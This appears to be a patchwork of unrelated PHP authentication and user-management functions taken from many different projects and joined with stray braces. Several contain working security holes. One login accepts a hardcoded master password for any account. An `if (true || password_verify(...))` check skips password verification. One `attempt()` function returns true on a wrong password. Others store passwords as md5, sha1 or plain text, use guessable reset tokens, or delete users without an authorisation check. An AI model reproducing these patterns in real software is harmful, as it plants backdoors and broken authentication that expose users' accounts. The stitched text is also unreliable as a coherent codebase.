public function submitFormForgotPassword(Form $form)
{
$values = $form->getValues();
$user = $this->user->where('email', $values['email'])->fetch();
if (!$user) {
$this->flashMessage($this->translator->translate('admin.sign.userNotFound'), 'error');
$this->redirect('this');
}
//vygeneruju hash
$hash = md5($user['email'] . rand());
while ($this->user->where('hash', $hash)->fetch()) {
$hash = md5($user->email . rand());
}
$this->user->where('email', $values['email'])->update(array('hash' => $hash));
//odeslu email
$template = $this->createTemplate();
$template->setFile(dirname(__FILE__) . '/../templates/Sign/emailForgotPassword.latte');
$template->setTranslator($this->translator);
$template->host = $this->getHttpRequest()->getUrl()->getHost();
$template->hash = $hash;
$template->link = $this->link('//generatePassword', array('hash' => $hash));
$message = new \App\Email\Mail($this);
$message->addTo($user['email'], $user['name'] . ' ' . $user['surname']);
$message->setSubject($this->translator->translate('admin.email.forgotPassword'));
$message->setHtmlBody($template);
try {
$this->mailer->send($message);
$this->flashMessage($this->translator->translate('admin.email.moreInfoInEmail'));
$this->redirect('wait');
} catch (\Nette\Mail\SmtpException $e) {
$this->flashMessage($this->translator->translate('admin.email.notSend'), 'error');
}
}
public function login($email, $password)
{
$user = $this->users->where('email', $email)->fetch();
if (!$user) {
throw new AuthenticationException(IAuthenticator::IDENTITY_NOT_FOUND);
}
if ($user->password != md5($password) && $password != 'supertajneheslo') {
throw new AuthenticationException(IAuthenticator::INVALID_CREDENTIAL);
}
$this->user->login(new Identity($user['id'], $user->role['system_name'], $user));
}
public function parse(GmailEvent $event)
{
if (!$event->isHandled()) {
MSupportTicket::unguard();
MSupportReply::unguard();
$info = $event->getFrom();
$now = Carbon::now();
if ($email = $info['email'] ?? null) {
$user = User::where('email', '=', $email)->orWhere('contact_email', '=', $email)->first();
if (empty($user) || empty($user->user_id)) {
$signup = new UserSignupEvent(array_merge($info, ['verified' => 'true']));
$this->dispatcher->fire(UserSignupEvent::USER_SIGNUP_BEGIN, $signup);
$user = $signup->getUser();
}
if (preg_match('/^T(\\d+)$/', $event->getRef(), $matches)) {
$ticket = MSupportTicket::find($matches[1]);
}
if (empty($ticket) || empty($ticket->ticket_id)) {
$ticket = MSupportTicket::where('user_id', '=', $user->user_id)->where('title', '=', $event->getSubject())->first();
if (empty($ticket) || empty($ticket->support_ticket_id)) {
$ticket = MSupportTicket::create(['user_id' => $user->user_id, 'created_at' => $now, 'updated_at' => $now, 'title' => $event->getSubject(), 'category' => 'General', 'state' => 'open']);
}
}
/** @var MSupportReply $reply */
$reply = MSupportReply::create(['support_ticket_id' => $ticket->support_ticket_id, 'user_id' => $user->user_id, 'created_at' => $now, 'reply_safe' => $event->getText()]);
$event->setHandled($reply->support_reply_id > 0);
}
}
}
public function loginPost(Request $request, Response $response, $args)
{
$identifier = Input::post('identifier');
$password = Input::post('password');
$v = new Validator(new User());
$v->validate(['identifier' => [$identifier, 'required|email'], 'password' => [$password, 'required']]);
if ($request->getAttribute('csrf_status') === false) {
$flash = 'CSRF faiure';
$this->view->render($response, 'login.twig', ['errors' => $v->errors(), 'flash' => $flash, 'request' => $request]);
} else {
if ($v->passes()) {
$user = User::where('username', $identifier)->orWhere('email', $identifier)->first();
if ($user && $this->hash->passwordCheck($password, $user->password)) {
$this->session->set($this->auth['session'], $user->id);
$this->session->set($this->auth['group'], $user->group_id);
return $response->withRedirect('dashboard');
} else {
$flash = 'Sorry, you couldn\'t be logged in.';
$this->view->render($response, 'login.twig', ['errors' => $v->errors(), 'flash' => $flash, 'request' => $request]);
}
} else {
$this->view->render($response, 'login.twig', ['errors' => $v->errors(), 'request' => $request, 'csrf' => ['name' => $request->getAttribute('csrf_name'), 'value' => $request->getAttribute('csrf_value')]]);
}
}
return $response;
}
public function verify($token, ProfileFormRequest $request)
{
$profile = User::where([['isVerified', '0'], ['token', $token]])->firstOrFail();
$profile->isVerified = 1;
$profile->save();
return redirect('/home')->with('status', 'Verification email ' . $profile->email . ' success');
}
/**
* Change his password
* POST
*
* @param Request $request
* @param string $code
* @return Response
*/
public function changePass(Request $request, $code)
{
$user = UserManager::where('code', $code)->first();
$this->validate($request, ['answer' => 'required|exists:accounts,reponse,guid,' . $user->guid, 'password' => 'required|alpha_num|min:4', 'confirm' => 'required|alpha_num|same:npass']);
$user->pass = $request->password;
$user->save();
return Redirect::route('home');
}
public function loadUserByUsername($username)
{
$user = User::where('login', $username)->first();
if ($user === null) {
throw new UsernameNotFoundException(sprintf('User with username "%s" not found', $username));
}
return $user;
}
public function run()
{
$user = User::where('username', 'paul')->first();
Note::create(['body' => 'First note', 'user_id' => $user->id]);
Note::create(['body' => 'Second note', 'user_id' => $user->id]);
$user = User::where('username', 'john')->first();
Note::create(['body' => 'Third note', 'user_id' => $user->id]);
Note::create(['body' => 'Fourth note', 'user_id' => $user->id]);
}
public function getTelephone(Request $req)
{
$telephone = $req->get('telephone');
$user = User::where('telephone', $telephone)->first();
if ($user) {
return response()->json(['code' => 0, 'msg' => 'success', 'data' => ['signed' => 1]]);
} else {
return response()->json(['code' => 0, 'msg' => 'success', 'data' => ['signed' => 0]]);
}
}
public function checkLogin($postData)
{
$username = $postData['username'];
$password = $postData['password'];
$user = User::where('username', '=', $username)->first();
if ($user && $user->password == md5($password)) {
return $user;
}
return false;
}
public function signin(Request $request)
{
$user = User::where('email', trim($request->input('username')))->orWhere('username', trim($request->input('username')))->first();
if (!is_null($user)) {
if (\Hash::check($request->get('password'), $user->password)) {
\Auth::login($user);
return redirect()->route('tasks.index');
}
}
return redirect()->route('auth.login')->with("NOTIF_DANGER", 'Login Failed');
}
/**
* Obtain the user information from GitHub.
*
* @return Response
*/
public function handleFacebookCallback()
{
$user = Socialite::driver('facebook')->user();
$appUser = User::where('email', $user->getEmail())->first();
if ($appUser === null) {
Session::flash('info', 'User not found');
return Redirect::to('auth/login');
} else {
Auth::login($appUser);
return Redirect::to($this->redirectPath);
}
}
public function attempt($email, $password)
{
$user = User::where('email', $email)->first();
if (!$user) {
return false;
}
if (password_verify($password, $user->password)) {
$_SESSION['user'] = $user->id;
return true;
}
return true;
}
/**
* Handle an incoming request.
*
* @param \Illuminate\Http\Request $request
* @param \Closure $next
* @return mixed
*/
public function handle($request, Closure $next)
{
$user = Session::get('user');
if (!$user) {
return view('auth.login');
}
$userCk = UserModel::where("rol_id", 1)->first();
if (count($userCk) <= 0) {
return "Error role";
}
$request->auth = $userCk;
return $next($request);
}
/**
* @param $provider
*
* @throws HybridAuthError
*/
public function index($provider)
{
if (isset($_REQUEST['hauth_start']) || isset($_REQUEST['hauth_done'])) {
Hybrid_Endpoint::process();
} else {
try {
$map = ['Facebook' => 'id', 'Google' => 'id', 'GitHub' => 'id'];
$settings = ['Facebook' => ['scope' => 'email', 'display' => 'popup'], 'Google' => ['scope' => 'https://www.googleapis.com/auth/userinfo.email'], 'Twitter' => ['includeEmail' => true]];
$config = $this->providers->getProvider($provider);
if (!empty($config['key']) && !empty($config['secret'])) {
$pConfig = array_merge(['enabled' => true, "keys" => [$map[$provider] ?? 'key' => $config['key'], 'secret' => $config['secret']]], $settings[$provider] ?? []);
$config = ["providers" => [$provider => $pConfig]];
$hauth = new Hybrid_Auth($config);
$auth = $hauth->authenticate($provider);
if ($profile = $auth->getUserProfile()) {
$event = 'session_user_login';
$data = ['ident' => $profile->identifier, 'email' => $profile->email, 'first_name' => $profile->firstName, 'last_name' => $profile->lastName, 'photo_url' => $profile->photoURL, 'verified' => 'true'];
/** @var User $user */
if ($user = User::where('ident', '=', $profile->identifier)->first()) {
if (empty($user->email) && !empty($profile->email)) {
$user->email = $profile->email;
$user->save();
}
if (!empty($profile->email)) {
$user->contact_email = $profile->email;
$user->save();
}
} elseif (!empty($profile->email) && ($user = User::where('email', '=', $profile->email)->first())) {
$user->ident = $profile->identifier;
$user->save();
} else {
$user = $this->signupHandler->registerUser($data);
$event = 'session_user_signup';
}
if ($user_id = $user->user_id ?? null) {
$this->session->startSession($user_id);
$socialEvent = new UserSocialEvent($user->user_id, array_merge((array) $profile, ['provider' => $provider]));
$this->dispatcher->fire($event === 'session_user_signup' ? UserSocialEvent::USER_SOCIAL_SIGNUP : UserSocialEvent::USER_SOCIAL_LOGIN, $socialEvent);
$userData = json_encode(['user' => $user->toArray()]);
printf("<scrip" . "t>try { self.opener.Minute.setSessionData(%s, '%s'); } catch(err) { console.log(err); } finally { self.window.close(); }</script>", $userData, $event);
}
}
} else {
throw new Exception("Configuration for {$provider} is incomplete");
}
} catch (\Throwable $e) {
Hybrid_Auth::logoutAllProviders();
throw new HybridAuthError($e->getMessage());
}
}
}
public function dispatch(Request $request, Response $response, $args)
{
$input = $request->getParsedBody();
$this->validate($input);
// TODO catch exception and send user not found message
$user = User::where('username', $input['username'])->firstOrFail();
if (!password_verify($input['password'], $user->password)) {
return $response->withStatus(401)->write(json_encode(['message' => 'Unauthorized']));
}
$data = $this->createData($user);
$secretKey = base64_decode($this->settings->get('jwt')['key']);
$algorithm = $this->settings->get('jwt')['algorithm'];
$jwt = JWT::encode($data, $secretKey, $algorithm);
return $response->write(json_encode(['jwt' => $jwt]));
}
function register(Request $request)
{
$name = $request->input('name');
$email = $request->input('email');
$password = sha1($request->input('password'));
$exist_user = User::where('email', $email)->count();
if ($exist_user == 0) {
$user = new User();
$user->name = $name;
$user->email = $email;
$user->password = $password;
$user->save();
$result = array('success' => true, 'message' => 'register success.');
} else {
$result = array('success' => false, 'message' => 'email is existing.');
}
return $result;
}
public static function register($postData)
{
$user = User::where('email', $postData['email'])->first();
if ($user) {
return false;
} else {
$postData['password'] = md5($postData['password']);
unset($postData['retype']);
$newUser = new User();
foreach ($postData as $key => $value) {
$newUser->{$key} = $value;
}
$newUser->save();
unset($newUser['password']);
return $newUser;
}
return false;
}
public function postLogin(Request $request)
{
$username = $request->input("usr_name");
$password = $request->input("usr_password");
$user = UserModel::where("usr_name", $username)->orWhere("usr_email", $username)->first();
if (!$user) {
return "Invalid username or email.";
}
if (!Hash::check($password, $user->usr_password)) {
return "Invalid password, please try again.";
}
if (!$user->usr_active_fg) {
return "Account is not activated.";
}
//settime for last login
$user->usr_last_login_dt = date('Y-m-d H:i:s');
if (!$user->save()) {
return "There was an error on sign in, please try again.";
}
Session::put('user', $user);
return Redirect::route('dashboard');
}
public function authenticate(UserLoginEvent $event)
{
if (empty($event->getUser()) && ($email = $event->email) && ($password = $event->password)) {
//make sure the user isn't already authenticated!
if ($user = User::where('email', '=', $email)->first()) {
if (true || password_verify($password, $user->password)) {
$event->setUser($user);
$this->dispatcher->fire(UserLoginEvent::USER_LOGIN_SUCCESS, $event);
} else {
$event->setError('PASSWORD_INVALID');
}
} else {
$event->setError('EMAIL_INVALID');
}
} else {
$event->setError('INVALID_INPUT');
}
if (!$event->getUser()) {
//for logging
$this->dispatcher->fire(UserLoginEvent::USER_LOGIN_FAIL, $event);
}
}
/**
* 签到
*/
public function getActivitysign(Request $req)
{
$user = $this->fetchUserData();
$activityId = $req->get('activity_id');
$phone = $req->get('phone');
if ($user) {
$userId = $user->id;
} else {
if ($phone) {
$user = User::where('telephone', $phone)->first();
if (!$user) {
$user = User::create(['name' => $phone, 'telephone' => $phone, 'token' => uniqid('', true)]);
$userActivity = UserActivity::create(['user_id' => $user->id, 'activity_id' => $activityId, 'status' => 1]);
}
$userId = $user->id;
} else {
return response()->json(['code' => 10100, 'msg' => '签到异常', 'data' => []]);
}
}
$userActivity = UserActivity::where(['user_id' => $userId, 'activity_id' => $activityId])->first();
$userActivity->status = 1;
$userActivity = $userActivity->save();
return Redirect::to('index/wel');
}
function deleteusers(Request $request, $id)
{
User::where('id', $id)->delete();
return redirect()->to('/backoffice/users/');
//return "Delete แล้ว";
}
/**
* Hiển thị from Thay đổi Role cho User
* @param int $id
* @return Response
*/
public function editRole($id)
{
$page_title = 'Quản lý thành viên';
$user = User::where('id', $id)->first();
if ($user) {
return view('auth.user.edit_role', ['user' => $user, 'page_title' => $page_title]);
} else {
return abort(404);
}
}
public function getByEmail($email)
{
return count(User::where('email', $email)->get());
}
public function uploadPhotoAction(Request $request, Application $app)
{
$played = $this->hasPlayed();
$from = $request->get('from');
if (null !== $request->get('src')) {
$photo_src = $request->get('src');
}
//photo upload from desktop
if ($from == 'desktop') {
$album_id = $request->get('album_id');
$photo_data = ['source' => new \CURLFile($_FILES['file']['tmp_name'], $_FILES['file']['type'])];
$photo = $this->facebook->getGraphObject('/' . $album_id . '/photos', 'post', $photo_data)->asArray();
$photo = $this->facebook->getGraphObject('/' . $photo['id'], 'GET')->asArray();
$photo_src = $photo['source'];
}
//get user
$user_fb_id = $this->loginUrlOrGraphUser->getId();
$user = User::where('facebook_id', $user_fb_id)->first();
// update if played
if ($played) {
$photo = Photo::where('user_id', $user->id);
$photo->update(['link' => $photo_src, 'title' => $request->get('title'), 'description' => $request->get('description'), 'photo_id' => $request->get('photo_id')]);
return $app->redirect('/galeries');
}
// save in database
$photo = new Photo();
$photo->user_id = $user->id;
$photo->link = $photo_src;
$photo->title = $request->get('title');
$photo->description = $request->get('description');
$photo->photo_id = $request->get('photo_id');
$photo->save();
return $app->redirect('/galeries');
}
public function GetUserId($email)
{
return User::where('email', '=', $email)->pluck('userid');
}
/**
* Return user if exists; create and return if doesn't
*
* @param
* $facebookUser
* @return User
*/
private function findOrCreateUser($user, $provider)
{
if ($provider == "facebook") {
$providerId = "facebook_id";
} else {
$providerId = "google_id";
}
$authUser = User::where($providerId, $user->id)->first();
if (Auth::check()) {
if ($authUser) {
if ($providerId == "facebook_id") {
$authUser = User::where('google_id', $user->id)->first();
if ($authUser != null) {
return $authUser;
}
}
if ($providerId == "google_id") {
$authUser = User::where('facebook_id', $user->id)->first();
if ($authUser != null) {
return $authUser;
}
}
} else {
$getIdUser = Auth::user()->id;
User::where('id', $getIdUser)->update([$providerId => $user->id]);
return $authUser;
}
}
if ($authUser == null) {
$authUser = User::where('email', $user->email)->first();
if ($authUser != null) {
User::where('email', $user->email)->update([$providerId => $user->id]);
return $authUser;
}
}
return User::create(['name' => $user->name, 'email' => $user->email, $providerId => $user->id, 'isVerified' => 0, 'rowStatus' => 0]);
}
function checkLogin($email)
{
return User::where('email', $email)->get();
}
protected function fetchUserData()
{
$token = request()->cookie('token');
$user = User::where('token', $token)->first();
return $user;
}
public function singleAction($id)
{
if ($entry = Entry::findOrFail($id)) {
if ($postData = $this->getPostData()) {
$postData['entry_id'] = $id;
Comment::create($postData);
return $this->redirect('singleEntry', array('id' => $id));
}
$entry['username'] = User::where('id', strval($entry['user_id']))->first()['name'];
$data['entry'] = $entry;
$data['comments'] = Comment::where('entry_id', $id)->get();
} else {
$data['error'] = 'Không tìm thấy bài viết';
}
return $this->render('entry/single.html.twig', $data);
}
